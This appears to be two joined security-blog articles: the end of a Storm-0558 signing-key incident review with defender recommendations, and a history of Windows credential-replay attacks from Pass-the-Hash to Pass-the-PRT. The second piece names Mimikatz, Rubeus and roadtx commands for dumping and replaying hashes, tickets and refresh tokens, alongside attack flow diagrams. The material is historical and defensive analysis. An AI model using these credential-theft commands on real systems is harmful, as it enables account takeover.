HSM custody for signing keys (M1). Generate signing keys inside an HSM with exportable=False. The HSM signs; the application asks. The key never leaves.
Automatic rotation (M3). Rotate signing keys on a cadence measured in days to weeks. Publish the new kid in your JWKS before signing with it; deprecate the old kid only after relying parties have had time to refresh their JWKS caches.
Issuer and audience enforcement (M4). Implement the combined iss and aud validation mandate RFC 8725 codifies in Sections 3.8 and 3.9, and test it with adversarial cross-tenant tokens. Write a test that forges a token from your tenant A and verifies that your tenant B's validator rejects it [@rfc-8725; @rfc-8725-html].
kid drift monitoring (M7). Alert on JWT validation events whose kid is not currently published in your issuer's JWKS. A forged token signed with a retired or unpublished kid will surface here.
JWKS cache invalidation discipline. Relying parties cache JWKS aggressively. Coordinate rotation with your largest relying parties; document the cache TTL you expect them to honor. OpenID Connect Discovery 1.0 specifies the JWKS discovery pattern but leaves cache TTL as a deployment choice; the publication of that contract is yours to make [@oidc-discovery]. Storm-0558's lesson is that an unrotated key is a permanent attack surface; a poorly-coordinated rotation is a permanent operational outage.
An on-call runbook for rotation failure. If automatic rotation fails, what is the page severity? Who is paged? How is manual rotation performed? Microsoft's 2021 pause of MSA manual rotation (after a manual-rotation-related outage) is the cautionary tale; the runbook is the prevention [@csrb-report-2024].

For higher-value deployments, add Confidential Compute (M2) -- run the signing service inside an attested TEE so that even host operators cannot read the in-use key. The threshold of "higher-value" is whatever value of "your customer's most sensitive resource accessed by a forged token" makes the in-use observation residual worth closing.

Note: HSM custody plus automatic rotation plus RFC 8725 Sections 3.8 and 3.9 enforcement plus kid drift monitoring plus rotation runbook. Add Confidential Compute for the in-use observation residual on high-value paths. Test cross-tenant token rejection adversarially; do not trust your validation library defaults [@rfc-8725; @rfc-8725-html; @sfi-sept-2024].

11.3 For CISOs evaluating a cloud IdP

The four RFP questions, mapped to the four pre-incident failure modes Section 3 catalogued:

(a) Where is the signing key custodied, and what FIPS certification does the HSM hold? (b) What is the rotation cadence for the IdP signing keys, and is rotation automated end-to-end? (c) Does the validation SDK enforce iss/aud separation by default, or does it leave the check to the caller? (d) What audit log events are available to free-tier customers, with what retention, and which events are gated behind paid tiers?

Map the answers to CSA CCM CEK and IAM domains and FedRAMP High SC-12 and IA-5 controls for cross-vendor normalization [@csa-ccm; @fedramp].

Ask the vendor: "If your production IdP signing key were stolen today, by what telemetry would you detect it, and within what time? What public-disclosure timeline would you commit to?" The answer reveals more about the vendor's posture than the answers to the four primary questions, because it forces the vendor to talk about a scenario their marketing material does not.

Key idea: Defense in depth defeats the plausible attack mechanisms. Whether it defeats the actual attack mechanism is unknown because, in the highest-stakes documented case, the actual mechanism is still unknown. The defender's posture is therefore "raise the floor against everything I can imagine," not "patch the specific bug." Storm-0558's enduring lesson is what it means to architect under that constraint.

The seven SOTA methods raise the floor against plausible mechanisms. The customer can demand documentation, alert on deviations, pay for the audit tier they actually need, and vote with procurement dollars for vendors whose disclosure posture matches Microsoft's post-CSRB stance. Prevention against a CSP-side custody failure remains, as Section 9 noted, on the CSP side by construction.

12. FAQ and Study Guide

No. That was Microsoft's September 6, 2023 working hypothesis. Microsoft itself partially retracted it on March 12, 2024 (see Section 4.1 for the full retraction text in the Callout). The Cyber Safety Review Board report on April 2, 2024 then concluded definitively that Microsoft "has been unable to determine how or when Storm-0558 obtained the MSA key" [@msrc-key-acquisition; @csrb-report-2024]. No. The U.S. State Department detected the breach on June 15, 2023, by reviewing `MailItemsAccessed` events in Microsoft 365 Purview audit logs against a maintained baseline of legitimate application IDs. The State Department notified Microsoft on June 16, 2023. Microsoft then confirmed the forgery by comparing the suspicious tokens' `kid` against its own published MSA key rotation history [@csrb-report-2024; @ms-security-jul14]. Microsoft's preliminary July 2023 disclosure said "approximately 25" [@msrc-storm0558-jul11]. The CSRB's April 2024 final tally is 22 enterprise organizations and approximately 503 related personal accounts, with approximately 60,000 emails exfiltrated from 10 U.S. State Department accounts alone [@csrb-report-2024]. The attack pattern -- steal an identity provider's signing key, mint forged tokens, present them to relying parties -- is generic and has prior public examples (Reiner's 2017 Golden SAML disclosure; the Russian SVR's 2020 Sunburst weaponization). What is Microsoft-specific is the *cross-tier* consumer/enterprise validation flaw and the unrotated 2016 key. No other major identity provider has publicly disclosed an analogous IdP-signing-key-class incident in the 2023-2026 window, but absence of public disclosure is not absence of risk [@reiner-golden-saml; @aa20-352a; @wiz-storm0558]. The Secure Future Initiative (SFI). Identity signing keys for both MSA and Entra ID are now generated, stored, and automatically rotated in Azure Managed HSM (FIPS 140-3 Level 3) as of the September 2024 progress report. The MSA signing service runs inside Azure Confidential VMs as of April 2025, with Entra ID's signing service migrating to the same. 90% of Entra ID tokens for Microsoft apps are validated by one consistent hardened identity SDK that enforces `iss`/`aud` separation. And `MailItemsAccessed` plus 30+ Purview audit event classes have been free for FCEB and most commercial customers since the September 2023 rollout, with default retention now 180 days and internal retention extended to two years [@sfi-sept-2024; @sfi-april-2025; @ms-blog-jul19-recovered]. Yes, in principle. Wiz Research's independent analysis demonstrated the compromised key could have signed tokens for any application using Microsoft's converged OpenID v2.0 endpoint that accepts personal-account authentication -- SharePoint, Teams, OneDrive, and a long tail of third-party "Sign in with Microsoft" applications. There is no public evidence the broader scope was actually exploited; the publicly documented victims are scoped to Exchange Online and Outlook. Whether broader exploitation occurred and was simply not detected against telemetry that did not exist remains an open question [@wiz-storm0558]. Because it inverts a default assumption. Cloud providers, in their marketing material, are the parties responsible for monitoring their own identity infrastructure. In Storm-0558, the cloud provider did not. A paying customer with a paid-tier audit log saw the anomaly first. The CSRB's harshest single critique is structural: the commercial logging-tier structure of cloud identity asymmetrically delays detection in favor of well-resourced customers, and the policy response (free Purview Audit features) is a partial but necessary correction [@csrb-report-2024; @cisa-statement-free-logs-fixed].

Pass-the-Hash to Pass-the-PRT: Twenty-Nine Years of Windows Credential Replay in One Family Tree

noreply@paragmali.com (Parag Mali) — Thu, 28 May 2026 00:00:00 GMT

Twenty-nine years of Windows credential-replay attacks -- Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Pass-the-Certificate, Pass-the-PRT -- are a single lineage, not five techniques. Each generation finds the next long-term authentication artefact that lives outside the latest Microsoft isolation boundary, then commoditises extraction in tooling that runs anywhere with local administrator. Credential Guard (2015) and KB5014754 (2022) bought years but not closure; Pass-the-PRT (Mollema + Delpy, 2020) already defeats both because the Primary Refresh Token lives in the CloudAP plug-in, which is not inside any current isolation scope. The next decade of Windows credential theft turns on whether Microsoft extends hypervisor-based isolation to CloudAP before commodity offensive tooling makes the attack universal.

1. Two Afternoons, Twenty-Nine Years Apart

On the afternoon of Tuesday, April 8, 1997, between 5:27 p.m. and 8:57 p.m. -- a window we can narrow to about three and a half hours from the file timestamps preserved in the patch he posted -- a researcher named Paul Ashton sat down with the Samba source tree and made the smallest possible change to smbclient.The bracketing mtimes Tue Apr 8 17:27:29 1997 and Tue Apr 8 20:57:43 1997 are preserved verbatim in the unified diff's *** and --- header lines on Exploit-DB advisory 19197 [@ashton-exploitdb-19197]. You can still download the diff today and confirm the timestamps yourself. Where the unpatched client computed a network response from a typed-in password, his version read the password's LM hash from smbpasswd on disk and fed it straight to the same encryption primitive, skipping the password entirely.

He posted the diff to NTBugtraq the same evening with a five-line advisory: "A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to 'decrypt' the password hash into its clear-text equivalent." [@ashton-exploitdb-19197]

Twenty-nine years later, every Windows credential-replay attack in commodity offensive tooling is a direct descendant of that afternoon.

Fast-forward to 2026. A Windows 11 23H2 laptop, hardened to Microsoft's published baseline. Credential Guard on. KB5014754 strong certificate mapping in full enforcement. Conditional Access enabled, with Token Protection where supported. An attacker has local admin -- the same starting position the 1997 attack assumed.

Two commands run on that machine, in the same paragraph. Mimikatz sekurlsa::logonpasswords returns empty NT hash and TGT buffers; Credential Guard has done its job. Then Mimikatz dpapi::cloudapkd /unprotect returns a valid Primary Refresh Token session key and proof-of-possession material [@mollema-prt-digging]. On a different machine across the internet, the attacker pastes that material into Dirk-jan Mollema's roadtx prt, mints an x-ms-RefreshTokenCredential cookie, and authenticates to Entra ID as the laptop's user [@mollema-prt-abusing] [@roadtools-github]. Every Microsoft defense shipped in 2015, 2022, and 2024 is running. The attack still wins.

Note: The empty buffer from sekurlsa::logonpasswords is the artefact of twenty-nine years of architectural lessons. The PRT extraction from dpapi::cloudapkd is the architecture of the next five-to-ten years. Both scenes are the same attack class. The credential changed; the protocol that consumes it changed; the long-term storage location changed; the lineage did not.

You will meet seven people in this article. Paul Ashton (1997, the patch). Hernan Ochoa (2008, the toolkit that put the technique inside Windows itself). Benjamin Delpy (2011, Mimikatz; and the Kerberos generations that followed). Sean Metcalf (2014, who named Overpass-the-Hash and wrote the practitioner reference that taught a generation of red and blue teams).

Will Schroeder and Lee Christensen (2021, "Certified Pre-Owned," the AD CS catalog that became Pass-the-Certificate). Oliver Lyak (2022, Certifried, the CVE that forced Microsoft to ship KB5014754). And Dirk-jan Mollema (2020, the Primary Refresh Token research this article argues is the most consequential credential-theft work since 2008). The cast is small. The lineage they built is the load-bearing structure of every Windows penetration test in 2026.

How is it possible that the same attack works in 1997 and 2026? The answer is structural, not coincidental -- and once you see it, you cannot unsee it.

2. The Architectural Property the Family Shares

NTLM authentication never asks for the password as a string. It asks for a function of the hash. The hash is the password.

That sentence is the article's load-bearing claim, and the rest of this section is its proof.

The Microsoft specification for the NTLM protocol -- [MS-NLMP], sections 3.3.1 and 3.3.2 -- writes the response computation in pseudocode. For NTLMv1, the server sends an 8-byte challenge; the client computes NtChallengeResponse = DESL(ResponseKeyNT, challenge), where ResponseKeyNT = NTOWFv1(password) = MD4(UNICODE(password)) [@ms-nlmp-3-3-1]. DESL is a variant of DES that pads the 16-byte NT hash to 21 bytes with five zero bytes, splits the result into three 7-byte sub-keys, runs DES on the 8-byte challenge under each sub-key, and concatenates the three 8-byte ciphertexts to form a 24-byte response.

NTLMv2 is more elaborate -- the response key is NTOWFv2 = HMAC_MD5(MD4(UNICODE(password)), UNICODE(Uppercase(User) + UserDom)), and the proof string is HMAC_MD5 of the challenge concatenated with a target-info structure -- but the structural property is identical: the cleartext password appears in exactly one place in the entire protocol, the input to the hash function on the client. The verifier performs the same computation against the stored NT hash from the SAM or NTDS.dit, and compares. Neither side ever transmits the password [@ms-nlmp-3-3-2].

This is what Microsoft means when its institutional documentation says Pass-the-Hash "cannot be patched at the protocol level." There is nothing to patch.The same property holds for any challenge-response protocol whose verifier stores a determinable function of the password rather than the password itself: Kerberos with stored long-term keys, CHAP with shared secrets, OAuth client_credentials with shared secrets, every HMAC-based proof-of-possession scheme.

The protocol takes a stored hash and produces a response. Swap the user's hash for the attacker's hash, and the protocol still produces a valid response, signed by the substituted key. The bug is not a bug; it is a documented property.

A family of Windows authentication protocols (NTLMv1 and NTLMv2) in which a server sends a random challenge and the client returns a response computed by applying a keyed cryptographic primitive (DES or HMAC-MD5) to that challenge under a key derived from the user's password. The verifier holds the same key and recomputes the response to confirm. The cleartext password is never transmitted [@ms-nlmp-3-3-1] [@ms-nlmp-3-3-2]. The 16-byte MD4 of the user's password as UTF-16 little-endian (`MD4(UNICODE(Passwd))` in the NLMP pseudocode). Unsalted by design, because NT was originally specified for an offline domain controller that has to verify against a fixed reference value. The NT hash is the long-term symmetric Windows authentication secret for every account, stored locally in the SAM and centrally in the NTDS.dit Active Directory database [@ms-nlmp-3-3-1]. The technique of authenticating to a service that uses NTLM (or any protocol descended from the same family) by feeding a stolen NT hash directly to the response-construction function, instead of typing a password the function would then hash. The terminology and the first working demonstration are due to Paul Ashton, NTBugtraq, April 1997 [@ashton-exploitdb-19197]. sequenceDiagram participant Client participant Server participant Verifier as SAM or NTDS.dit Client->>Server: NTLM_NEGOTIATE Server->>Client: NTLM_CHALLENGE with 8-byte nonce Note over Client: ResponseKeyNT equals NTOWFv1 of stored NT hash Note over Client: NtChallengeResponse equals DESL of ResponseKeyNT and nonce Client->>Server: NTLM_AUTHENTICATE with response Server->>Verifier: Look up stored NT hash for user Verifier-->>Server: Stored NT hash Note over Server: Recompute DESL of stored hash and nonce Server->>Client: Authentication succeeds if responses match

Key idea: The hash is the password. Any long-term authentication artefact reachable by the process that uses it is replayable -- and every credential type the rest of this article discusses (Kerberos TGT, certificate private key, Primary Refresh Token session key) is a different instance of this same property. Defenses can isolate one artefact at a time; the property is intrinsic to the architecture.

Ashton's 1997 patch was the protocol-disclosure proof. He swapped a single function call -- SMBencrypt(pass, cryptkey, pword) became E_P24(p21, cryptkey, pword), where p21 is the user's LM hash read directly from smbpasswd -- and Samba's smbclient authenticated to NT 3.51 and NT 4.0 file servers without ever knowing the user's password [@ashton-exploitdb-19197]. You can read the patch in five minutes. It is also, in a precise sense, the first proof that NTLM's response computation is hash-equivalent: if substituting the hash works, then mathematically the hash is what the protocol wanted all along.

And then nothing happened for eleven years.

That gap deserves its own explanation, because the eleven-year interregnum is the cleanest failure mode in the lineage.

Wikipedia's modern summary of the pre-2008 limitation reads: "even after performing NTLM authentication successfully using the pass the hash technique, tools like Samba's SMB client might not have implemented the functionality the attacker might want to use. This meant that it was difficult to attack Windows programs that use DCOM or RPC. Also, because attackers were restricted to using third-party clients when carrying out attacks, it was not possible to use built-in Windows applications, like Net.exe or the Active Directory Users and Computers tool amongst others, because they asked the attacker or user to enter the cleartext password to authenticate, and not the corresponding password hash value." [@wikipedia-pass-the-hash]

Inside Microsoft the 1997 patch was treated as confirming a known property of LSASS-resident credentials, not as a new attack class. The institutional position was that any compromise yielding the hash already implied SYSTEM-equivalent access, and that the realistic chain was "exfiltrate the hash and crack it offline," not "replay the hash." The architectural counter-claim -- that *replaying* the hash from inside a Windows process bypasses every native-tool obstacle -- took a decade to land in the practitioner literature. The 2012 Duckwall + Campbell Black Hat USA paper named the lag in its title: "Still Passing the Hash 15 Years Later." [@duckwall-campbell-bh2012]

If the obstacle is "built-in Windows tools ask for cleartext," the architectural answer is to put the substituted hash inside the Windows process that those tools rely on. That insight took eleven years to operationalise. The person who operationalised it was Hernan Ochoa, in 2008.

3. From Patch to Toolkit: The Windows-Native Pivot

By 2008, Ashton's 1997 patch had been sitting on NTBugtraq for eleven years. Hernan Ochoa had a different idea: instead of patching the client, patch the credential cache.

The artefact Ochoa shipped at CanSecWest 2008 and Black Hat USA 2008 was called the Pass-the-Hash Toolkit, distributed through Core Security Technologies' open-source projects page [@corelabs-pshtoolkit-wayback]. It contained two principal executables. whosthere.exe read the NTLM credentials cached in LSASS for the active logon sessions, and iam.exe opened the LSASS process with PROCESS_VM_WRITE, located the cached credential block for the current interactive logon session, and overwrote the username, domain, and NT hash fields with attacker-supplied values in place (a companion genhash.exe computed hashes).

Once the substitution was in place, every native Windows SSO consumer -- net.exe, wmic, mstsc once Restricted Admin RDP shipped years later, SMB, RPC, DCOM -- transparently picked up the attacker-supplied hash, because the OS handed them what it believed were the legitimate user's credentials.

Wikipedia summarises the architectural pivot in one paragraph: "It allowed the user name, domain name, and password hashes cached in memory by the Local Security Authority to be changed at runtime after a user was authenticated -- this made it possible to 'pass the hash' using standard Windows applications, and thereby to undermine fundamental authentication mechanisms built into the operating system." [@wikipedia-pass-the-hash] The eleven-year limitation was gone. Pass-the-Hash was now a Windows-native attack that worked against any tool that read its credentials from LSASS -- which in practice meant every Windows tool.

The user-mode Windows process (`lsass.exe`) that handles interactive logon, owns the Security Reference Monitor's policy decisions, and -- relevant to this article -- caches the in-memory credential material that supports Single Sign-On for the duration of each logon session: NT hashes for NTLM, Kerberos TGTs and session keys, certificate handles, and (since Azure AD / Entra ID device join) Primary Refresh Token material in the CloudAP plug-in. Every credential-replay technique in this article reaches its target by reading LSASS in some form.

The 2012 retrospective is where the security industry stopped pretending Pass-the-Hash was solved. Alva Duckwall and Christopher Campbell shipped a Black Hat USA 2012 paper titled, unambiguously, "Still Passing the Hash 15 Years Later." [@duckwall-campbell-bh2012] The title is the load-bearing pull-quote: it named Ashton 1997 as the origin, Ochoa 2008 as the Windows-native pivot, and the industry's continued failure to ship a structural fix as the central fact. From this point onwards Microsoft itself acknowledged Pass-the-Hash as a structural property of NTLM rather than a fixable bug.

Hernan Ochoa's Windows Credentials Editor (WCE), released a year after the Pass-the-Hash Toolkit, developed the same LSASS-injection primitive on a separate code base. Two independent implementations converging on the same memory-access pattern in the same window is the clearest indication that the architectural insight -- "the credential is sitting in a process you can write to" -- was overdetermined once anyone went looking for it.

What did Ashton's 1997 patch leave on the table? The other long-term credentials that LSASS held. The NT hash was the first. There would be more.

If you can read the NT hash from LSASS, you can read the Kerberos TGT from LSASS. The same memory-access primitive that animates IAM.EXE is one commit away from animating sekurlsa::tickets. That commit shipped in May 2011. Its author was a twenty-five-year-old French programmer named Benjamin Delpy.

4. Mimikatz and the Kerberos Turn

In May 2011, Benjamin Delpy posted his first public release of a program he had been writing as a side project to learn C. He was twenty-five, working as an IT manager at an institution he has never publicly named. Andy Greenberg's Wired profile records the date: "He released it publicly in May 2011, but as a closed source program." [@wired-greenberg-mimikatz] Wikipedia corroborates: "He released the first version of the software in May 2011 as closed source software." [@wikipedia-mimikatz] The program was called Mimikatz.

What made Mimikatz architecturally different from Ochoa's toolkit was that it was modular. The credential-extraction primitives lived in named command groups: sekurlsa::logonpasswords dumped NT hashes from LSASS; sekurlsa::tickets dumped Kerberos tickets from LSASS; kerberos::ptt injected a stolen ticket into the current Kerberos cache via the documented LsaCallAuthenticationPackage API with the KerbSubmitTicketMessage message [@ms-lsa-call-auth-package]; lsadump::dcsync (added August 2015, in collaboration with Vincent Le Toux) impersonated a domain controller and asked another DC for the krbtgt hash via the IDL_DRSGetNCChanges replication RPC [@adsec-dcsync-p1729].

Same LSASS, different artefact, different protocol surface. The architectural property section 2 named had two artefacts to work with on Windows: the NT hash, and the Kerberos TGT.

This is Pass-the-Ticket (Generation 2). The stolen TGT plus its session key authenticates the holder as the original principal for the ticket's lifetime, which on a default AD deployment is ten hours, renewable for seven days. Time complexity per replay: O(1). The TGT session key is the load-bearing piece -- without it, the ticket is opaque encrypted bytes that the holder cannot decrypt, sign, or present back to the KDC. Mimikatz's sekurlsa::tickets /export writes the ticket as a .kirbi file on disk; kerberos::ptt <file> re-injects on any machine where the user has a Kerberos credentials cache.

The long-lived Kerberos credential issued by the KDC's Authentication Service (AS-REP) in response to a successful AS-REQ. The TGT is encrypted under the KDC's own krbtgt-account long-term key and contains a session key that the client uses to subsequently request service tickets from the Ticket Granting Service (TGS). Specification: RFC 4120, section 3 [@rfc-4120]. On a Windows Active Directory deployment the default TGT lifetime is 10 hours with renewal up to 7 days. The technique of extracting a Kerberos TGT (and its session key) from one machine's LSASS-resident Kerberos cache and injecting it into another machine's cache, so that subsequent service-ticket requests authenticate as the ticket's original principal. Tool of record: Mimikatz `sekurlsa::tickets` + `kerberos::ptt`; equivalent functionality in Rubeus and Impacket. sequenceDiagram participant Victim as Victim host participant Attacker as Attacker host participant KDC Note over Victim: User logged in, TGT cached in LSASS Kerberos package Attacker->>Victim: mimikatz sekurlsa::tickets export Victim-->>Attacker: TGT.kirbi (ticket plus session key) Note over Attacker: mimikatz kerberos::ptt TGT.kirbi Attacker->>KDC: TGS-REQ presenting injected TGT KDC-->>Attacker: TGS-REP service ticket Attacker->>Attacker: Authenticate to any Kerberos service as the victim

Note: A common shorthand says that Microsoft's Credential Guard isolated NT hashes, so attackers shifted to TGTs. That arrow runs backwards in time. Pass-the-Ticket predates Credential Guard by years -- the Mimikatz Kerberos primitives developed between the May 2011 closed-source release and the April 6, 2014 open-source commit (the earliest verifiable source-level evidence for sekurlsa::tickets and kerberos::ptt), and were presented in detail at Black Hat USA 2014 by Duckwall and Delpy [@infocondb-bh2014-duckwall] [@duckwall-delpy-bh2014-wp]. Pass-the-Ticket exists because TGTs are also in LSASS, not as a defensive response. The shift to a new artefact happened because the architectural property of credential extraction generalised, not because Credential Guard pushed attackers there.

The third generation followed shortly. Overpass-the-Hash observes that for the RC4-HMAC Kerberos encryption type -- the Windows default from Windows 2000 through November 2022 -- the user's long-term Kerberos key is the unchanged NT hash.

RFC 4757, authored by K. Jaganathan, L. Zhu, and J. Brezak of Microsoft and published as informational in December 2006, specifies the RC4-HMAC enctype's long-term key as the existing NT hash without modification [@rfc-4757]. An attacker who holds the NT hash can drive a legitimate Kerberos AS-REQ to the KDC, encrypt the timestamp pre-auth blob with the NT hash as the RC4-HMAC key, and receive a real TGT signed by the real krbtgt.

The economic effect is large. Pass-the-Hash gets you NTLM-based services -- SMB, RPC, and any protocol over them. Overpass-the-Hash gets you the entire Kerberos surface: Kerberos-only services, services that require Kerberos for delegation, services with NTLM disabled at the GPO level. Same NT hash. Different downstream protocol. Strictly larger attack surface.

The technique of presenting a stolen NT hash to the KDC as the user's long-term RC4-HMAC Kerberos key (per RFC 4757 [@rfc-4757]), obtaining a real TGT signed by the real krbtgt, and operating as a real Kerberos client for the ticket's lifetime. Tool of record: Mimikatz `sekurlsa::pth /user: /domain: /ntlm: /run:` and Rubeus `asktgt /user: /rc4:`. Per Sean Metcalf's adsecurity.org reference, the technique is named "over" because the hash is promoted one notch up the protocol stack from NTLM into Kerberos [@adsec-mimikatz-p556] [@adsec-kerberos-p2293]. sequenceDiagram participant Attacker participant KDC participant Service as Kerberos service Note over Attacker: Holds NT hash for user (e.g. from sekurlsa::logonpasswords) Attacker->>KDC: AS-REQ with PA-ENC-TIMESTAMP encrypted under RC4-HMAC(NT hash) KDC->>KDC: Verify PA-ENC-TIMESTAMP decrypts cleanly KDC-->>Attacker: AS-REP with real TGT signed by krbtgt Attacker->>KDC: TGS-REQ for Service KDC-->>Attacker: TGS-REP service ticket Attacker->>Service: AP-REQ authenticate as user Service-->>Attacker: Access granted

The naming has its own story. The Mimikatz capability is Delpy's; the term "Overpass-the-Hash" and the taxonomic framing that distinguishes it from straight Pass-the-Hash spread through the practitioner community via Sean Metcalf's adsecurity.org reference [@adsec-mimikatz-p556] and the Duckwall + Delpy Black Hat USA 2014 talk and whitepaper [@infocondb-bh2014-duckwall] [@duckwall-delpy-bh2014-wp]. The earliest archived snapshot of the adsecurity.org reference is October 1, 2014; the talk timestamp is August 7, 2014. The two sources are essentially contemporaneous, and Metcalf's later "Red vs. Blue" Black Hat USA 2015 whitepaper consolidates the practitioner taxonomy [@metcalf-bh2015-red-vs-blue].

The "Overpass" coinage is a deliberate semantic argument that the technique is one notch above Pass-the-Hash on the protocol stack: the NT hash, which began life as an NTLM response key, is being promoted into Kerberos as a long-term encryption key. The naming credit is socially distributed -- Metcalf, Delpy, Duckwall, and Mimikatz's own command group all carry traces of it -- so this article uses Metcalf's reference as the canonical practitioner explainer rather than as a single inventor citation.

The DigiNotar incident in September 2011 is the first publicly attributed criminal use of Mimikatz, four months after Delpy's first public release. The Dutch certificate authority DigiNotar -- founded 1998, acquired by VASCO in January 2011, hacked in June 2011, declared bankrupt in September 2011 [@wikipedia-diginotar] -- was used to issue hundreds of fraudulent certificates that were then used in man-in-the-middle attacks on Iranian Gmail users [@wikipedia-diginotar] [@fox-it-operation-black-tulip].

Greenberg's Wired profile records that Delpy was told by the breach investigators that Mimikatz had been used during the intrusion [@wired-greenberg-mimikatz]. The single-source attribution warrants a hedge -- Greenberg's source is Delpy himself, quoting investigators -- but the underlying breach timeline is solid.

The decision to open-source Mimikatz on April 6, 2014 is dated by the GitHub repository banner: `mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)` [@mimikatz-github]. The precipitating event, as Delpy told Wired, was a trip to Moscow: he returned to his hotel room to find a stranger at his laptop; a second man approached him in the lobby that evening and demanded source code on a USB stick. He decided defenders needed the source as much as the attackers already did, and pushed it to GitHub when he got home [@wired-greenberg-mimikatz].

By 2014, the credential-replay family had three generations -- Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash -- and Microsoft's only documented response was a forty-page PDF. The next section is what that PDF said, and why documentation alone cannot end an attack class.

5. Documentation Is Not Defense

By December 2012, Microsoft had a problem. Duckwall and Campbell had just shipped a Black Hat USA paper titled "Still Passing the Hash 15 Years Later" [@duckwall-campbell-bh2012]. Mimikatz was eighteen months old. The institutional position that Pass-the-Hash was a "post-compromise issue" -- the line Microsoft had held since 1997 -- was no longer survivable in public.

The institutional response came in two waves. Mitigating Pass-the-Hash Attacks and Other Credential Theft, version 1, shipped in late 2012 (most practitioner secondaries place it in December 2012; no primary Microsoft URL with a verifiable v1 timestamp survives today).

Version 2 followed in July 2014, extending the v1 playbook with the new defensive surfaces that shipped in Windows 8.1 and Windows Server 2012 R2: Protected Users as a deployable security group, Restricted Admin RDP as a default-available feature, LSA Protection (RunAsPPL) as a registry-toggleable defense, and Authentication Policies and Silos as KDC-side restrictions [@ms-download-mitigating-pth-v2]. The two whitepapers are the closest thing the industry got to an institutional Microsoft acknowledgment that Pass-the-Hash was a load-bearing operational problem requiring a defensive playbook rather than a patch.

What did the playbook recommend? Three orthogonal stopgaps, each with a published bypass.

Protected Users (Windows Server 2012 R2). A security group whose membership bans, on the DC side, NTLM authentication, DES and RC4 Kerberos pre-authentication, and Kerberos unconstrained delegation; and, on the device side, NTLM caching of the user's plaintext credentials or NTOWF and Kerberos DES/RC4 long-term keys. Member TGTs are capped at 240 minutes (four hours) with no renewal [@ms-protected-users]. Documented bypasses: requires explicit opt-in per account, breaks any service that depended on unconstrained delegation, does not apply to computer accounts or service accounts by default, and has no effect on Kerberos AES-key extraction from LSASS (since AES keys are not banned; only RC4 is).

Restricted Admin RDP (introduced in Windows 8.1 / Server 2012 R2 RTM, October 2013; backported to Windows 7 / Server 2008 R2 / Windows 8 / Server 2012 by KB2871997 on May 13, 2014 [@ms-kb2871997-may2014]). An opt-in RDP mode that authenticates to the target without sending credentials, so a compromised target cannot harvest the RDP user's hash from its own LSASS. Documented bypass: opt-in per session, applies only to RDP, leaves SMB, WMI, and RPC unprotected. And it enables Pass-the-Hash for RDP -- the BloodHound CanRDP edge documents the abuse path with the exact Mimikatz command for injecting a stolen NT hash into mstsc.exe /restrictedadmin [@bloodhound-canrdp].

LSA Protection / RunAsPPL (Windows 8.1). A registry toggle that marks LSASS as a Protected Process Light, so non-PPL processes (including unsigned admin tools) cannot open it with PROCESS_VM_READ. Documented bypass: any signed kernel driver -- including loadable third-party drivers -- can still read PPL memory, and an attacker with local admin can load such a driver. The itm4n analysis includes the verbatim Mimikatz output where sekurlsa::logonpasswords returns access-denied against a PPL-marked LSASS, and shows that an attacker who loads a signed driver via the BYOVD pattern ("bring your own vulnerable driver") or escalates to kernel mode bypasses the marking. itm4n's framing -- "Credential Guard and LSA Protection are actually complementary" [@itm4n-lsass-runasppl] -- is also the prediction: PPL is part of the answer, but only when paired with the architectural pivot still to come.

A Windows Server 2012 R2 security group whose membership applies a set of restrictions, enforced jointly by the device and the domain controller, that block the most commonly extracted long-term credential material: no NTLM, no Kerberos RC4 or DES pre-auth, no unconstrained delegation, no NT-hash caching, and a 240-minute TGT lifetime with no renewal [@ms-protected-users].

The structural point is this. Documentation tells administrators what to do. It does not prevent the underlying LSASS-resident credential extraction. Every defense documented in v1 and v2 of the Mitigating-PtH whitepapers is bypassable, with a known and published technique, on any system where the attacker already has local administrator -- and local administrator is exactly what Pass-the-Hash exploitation already implies. The defender's win condition is to keep the attacker from ever getting to local admin in the first place; once they have it, every documented mitigation is a speed bump rather than a wall.

Note: The 2012-2014 era's load-bearing failure mode was assuming that telling administrators where credentials should live would prevent extraction from where they do live. Protected Users, Restricted Admin RDP, RunAsPPL, and Authentication Silos are all useful, and stacked together they raise the cost of post-admin exploitation. None of them moves the credential out of the address space the attacker can read.

A common secondary characterisation cites a "v3 2017" of the whitepaper alongside v1 and v2. That document does not exist in Microsoft Download Center ID 36036; the page lists Version 2.0; the 2023 Wayback snapshot of the same Download Center page records Date Published 7/7/2014, while the live page now shows a 2024 republication date for the same Version 2.0 PDF without a version bump [@ms-download-mitigating-pth-v2]. The Download Center page carries v2 metadata only -- v1's late-2012 date is sourced through contemporary practitioner literature rather than a primary Microsoft timestamp. After 2014 the post-v2 institutional documentation moves to the Microsoft Learn Credential Guard page rather than to a third whitepaper revision -- a structural choice, because by 2015 the architectural answer has shifted from prose to code.

By mid-2014 Microsoft's institutional position was that the protocol-level fix was unavailable and the architectural answer would need to relocate the credentials. If credentials cannot stay in LSASS where every admin process can read them, the credentials have to be moved to a place admin processes cannot read. That insight produces Credential Guard.

6. Credential Guard and the Architectural Pivot

On July 29, 2015, Microsoft shipped Windows 10 Enterprise [@ms-lifecycle-w10-enterprise]. Hidden in the RTM build was the first defense in the credential-replay lineage that wasn't documentation: hardware-rooted isolation. They called it Credential Guard.

The architecture is worth unpacking carefully, because every later generation of the family is best read as "what does this attack do to the assumptions Credential Guard makes?"

Credential Guard runs on top of Virtualization-Based Security. The Windows hypervisor partitions user mode into two virtual trust levels. VTL0 is the normal user partition: normal user-mode processes, including the normal LSASS, and the normal kernel. VTL1 is the isolated user partition: a small set of trustlets, signed user-mode processes the hypervisor protects from VTL0 inspection. Credential Guard's trustlet is LSAISO ("LSA Isolated"), a stripped-down clone of the LSA credential cache holding the material Microsoft wants out of VTL0. Hypervisor-enforced Code Integrity (HVCI) below enforces W^X on the VTL0 kernel, blocking kernel-mode bypasses that would otherwise read VTL1 memory directly.

